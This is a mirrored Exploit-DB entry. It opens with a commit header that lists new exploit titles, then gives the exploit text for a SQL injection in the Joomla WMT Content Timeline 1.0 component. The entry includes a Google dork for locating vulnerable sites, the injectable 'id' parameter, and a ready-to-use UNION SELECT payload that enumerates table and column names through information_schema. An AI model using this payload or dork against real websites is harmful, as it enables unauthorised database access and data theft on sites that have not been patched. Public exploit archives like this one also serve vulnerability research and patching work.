exploit-db-mirror/platforms/php/webapps/41382.txt
Offensive Security 2d72a9c8b9 DB: 2017-02-18
4 new exploits

Netgear WGR614v9 Wireless Router - GET Request Denial of Service
Netgear WGR614v9 Wireless Router - Denial of Service

ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities
Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities

ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service
Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service

ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation
Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation

Windows x86 - Protect Process Shellcode (229 bytes)

Qwerty CMS - 'id' SQL Injection
Qwerty CMS - 'id' Parameter SQL Injection

Golabi CMS - Remote File Inclusion
Golabi CMS 1.0 - Remote File Inclusion
blogman 0.45 - Multiple Vulnerabilities
EZ-Blog 1b - Delete All Posts / SQL Injection
Blogman 0.45 - Multiple Vulnerabilities
EZ-Blog beta1 - Delete All Posts / SQL Injection

Access2asp - imageLibrary - (ASP) Arbitrary File Upload
Access2asp - imageLibrary - Arbitrary File Upload

Joomla! Component com_digistore - 'pid' Blind SQL Injection
Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection

EZ-Blog Beta2 - (category) SQL Injection
EZ-Blog Beta2 - 'category' Parameter SQL Injection
Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection
Joomla! Component Groovy Gallery 1.0.0 - SQL Injection
Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection
2017-02-18 05:01:17 +00:00

18 lines
No EOL
1 KiB
Text
Executable file

# # # # #
# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_wmt_content_timeline
# Date: 17.02.2017
# Vendor Homepage: http://devecostudio.com
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
# # # # #